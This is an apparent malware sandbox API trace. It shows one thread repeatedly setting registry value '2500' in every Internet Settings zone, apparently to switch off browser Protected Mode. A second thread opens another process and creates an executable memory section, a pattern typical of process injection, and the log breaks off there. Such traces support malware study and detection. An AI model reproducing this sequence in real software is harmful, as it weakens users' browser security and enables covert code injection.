	[0079.851] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0079.851] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0079.851] RegCloseKey (hKey=0x224) returned 0x0
	[0079.852] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0079.852] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0079.852] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0079.852] RegCloseKey (hKey=0x224) returned 0x0
	[0079.852] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0079.852] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0079.852] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0079.852] RegCloseKey (hKey=0x224) returned 0x0
	[0079.852] Sleep (dwMilliseconds=0x3e8) 
	[0080.910] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0080.910] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x34c) returned 0x0
	[0080.910] RegSetValueExA (in: hKey=0x34c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0080.910] RegCloseKey (hKey=0x34c) returned 0x0
	[0080.910] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0080.910] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x34c) returned 0x0
	[0080.910] RegSetValueExA (in: hKey=0x34c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0080.910] RegCloseKey (hKey=0x34c) returned 0x0
	[0080.910] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0080.910] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x34c) returned 0x0
	[0080.910] RegSetValueExA (in: hKey=0x34c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0080.911] RegCloseKey (hKey=0x34c) returned 0x0
	[0080.911] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0080.911] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x34c) returned 0x0
	[0080.911] RegSetValueExA (in: hKey=0x34c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0080.911] RegCloseKey (hKey=0x34c) returned 0x0
	[0080.911] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0080.911] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x34c) returned 0x0
	[0080.911] RegSetValueExA (in: hKey=0x34c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0080.911] RegCloseKey (hKey=0x34c) returned 0x0
	[0080.911] Sleep (dwMilliseconds=0x3e8) 
	[0081.951] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0081.951] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x3bc) returned 0x0
	[0081.952] RegSetValueExA (in: hKey=0x3bc, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0081.952] RegCloseKey (hKey=0x3bc) returned 0x0
	[0081.952] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0081.952] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x3bc) returned 0x0
	[0081.952] RegSetValueExA (in: hKey=0x3bc, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0081.952] RegCloseKey (hKey=0x3bc) returned 0x0
	[0081.952] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0081.953] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x3bc) returned 0x0
	[0081.953] RegSetValueExA (in: hKey=0x3bc, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0081.953] RegCloseKey (hKey=0x3bc) returned 0x0
	[0081.953] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0081.953] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x3bc) returned 0x0
	[0081.953] RegSetValueExA (in: hKey=0x3bc, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0081.953] RegCloseKey (hKey=0x3bc) returned 0x0
	[0081.953] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0081.953] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x3bc) returned 0x0
	[0081.953] RegSetValueExA (in: hKey=0x3bc, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0081.953] RegCloseKey (hKey=0x3bc) returned 0x0
	[0081.953] Sleep (dwMilliseconds=0x3e8) 
	[0083.208] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0083.208] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x45c) returned 0x0
	[0083.209] RegSetValueExA (in: hKey=0x45c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0083.209] RegCloseKey (hKey=0x45c) returned 0x0
	[0083.209] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0083.209] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x45c) returned 0x0
	[0083.209] RegSetValueExA (in: hKey=0x45c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0083.209] RegCloseKey (hKey=0x45c) returned 0x0
	[0083.209] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0083.209] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x45c) returned 0x0
	[0083.209] RegSetValueExA (in: hKey=0x45c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0083.209] RegCloseKey (hKey=0x45c) returned 0x0
	[0083.209] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0083.209] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x45c) returned 0x0
	[0083.209] RegSetValueExA (in: hKey=0x45c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0083.209] RegCloseKey (hKey=0x45c) returned 0x0
	[0083.209] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0083.209] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x45c) returned 0x0
	[0083.209] RegSetValueExA (in: hKey=0x45c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0083.209] RegCloseKey (hKey=0x45c) returned 0x0
	[0083.210] Sleep (dwMilliseconds=0x3e8) 
	[0084.228] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0084.228] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x65c) returned 0x0
	[0084.228] RegSetValueExA (in: hKey=0x65c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0084.228] RegCloseKey (hKey=0x65c) returned 0x0
	[0084.228] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0084.228] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x65c) returned 0x0
	[0084.228] RegSetValueExA (in: hKey=0x65c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0084.229] RegCloseKey (hKey=0x65c) returned 0x0
	[0084.229] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0084.229] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x65c) returned 0x0
	[0084.229] RegSetValueExA (in: hKey=0x65c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0084.229] RegCloseKey (hKey=0x65c) returned 0x0
	[0084.229] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0084.229] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x65c) returned 0x0
	[0084.229] RegSetValueExA (in: hKey=0x65c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0084.229] RegCloseKey (hKey=0x65c) returned 0x0
	[0084.229] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0084.229] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x65c) returned 0x0
	[0084.229] RegSetValueExA (in: hKey=0x65c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0084.229] RegCloseKey (hKey=0x65c) returned 0x0
	[0084.229] Sleep (dwMilliseconds=0x3e8) 
	[0085.486] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0085.486] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x6a0) returned 0x0
	[0085.487] RegSetValueExA (in: hKey=0x6a0, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0085.487] RegCloseKey (hKey=0x6a0) returned 0x0
	[0085.487] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0085.487] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x6a0) returned 0x0
	[0085.487] RegSetValueExA (in: hKey=0x6a0, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0085.487] RegCloseKey (hKey=0x6a0) returned 0x0
	[0085.487] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0085.487] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x6a0) returned 0x0
	[0085.487] RegSetValueExA (in: hKey=0x6a0, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0085.487] RegCloseKey (hKey=0x6a0) returned 0x0
	[0085.487] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0085.487] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x6a0) returned 0x0
	[0085.488] RegSetValueExA (in: hKey=0x6a0, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0085.488] RegCloseKey (hKey=0x6a0) returned 0x0
	[0085.488] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0085.488] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x6a0) returned 0x0
	[0085.488] RegSetValueExA (in: hKey=0x6a0, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0085.488] RegCloseKey (hKey=0x6a0) returned 0x0
	[0085.488] Sleep (dwMilliseconds=0x3e8) 

Thread:
	id = 57
	os_tid = 0xf88

	[0070.452] OpenProcess (dwDesiredAccess=0x43a, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.452] GetCurrentProcess () returned 0xffffffff
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.452] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.453] GetProcAddress (hModule=0x765a0000, lpProcName="IsWow64Process") returned 0x765b9f10
	[0070.453] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2d0ff34 | out: Wow64Process=0x2d0ff34) returned 1
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.453] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.454] GetProcAddress (hModule=0x765a0000, lpProcName="IsWow64Process") returned 0x765b9f10
	[0070.454] IsWow64Process (in: hProcess=0x224, Wow64Process=0x2d0ff34 | out: Wow64Process=0x2d0ff34) returned 1
	[0070.454] GetVersion () returned 0x23f00206
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.454] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.455] GetProcAddress (hModule=0x77960000, lpProcName="NtCreateSection") returned 0x779d7140
	[0070.455] NtCreateSection (in: SectionHandle=0x2d0fec4, DesiredAccess=0xf001f, ObjectAttributes=0x2d0fe50*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x2d0fe8c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2d0fec4*=0x220) returned 0x0
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.455] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
	[0070.456] GetLastError () returned 0x57
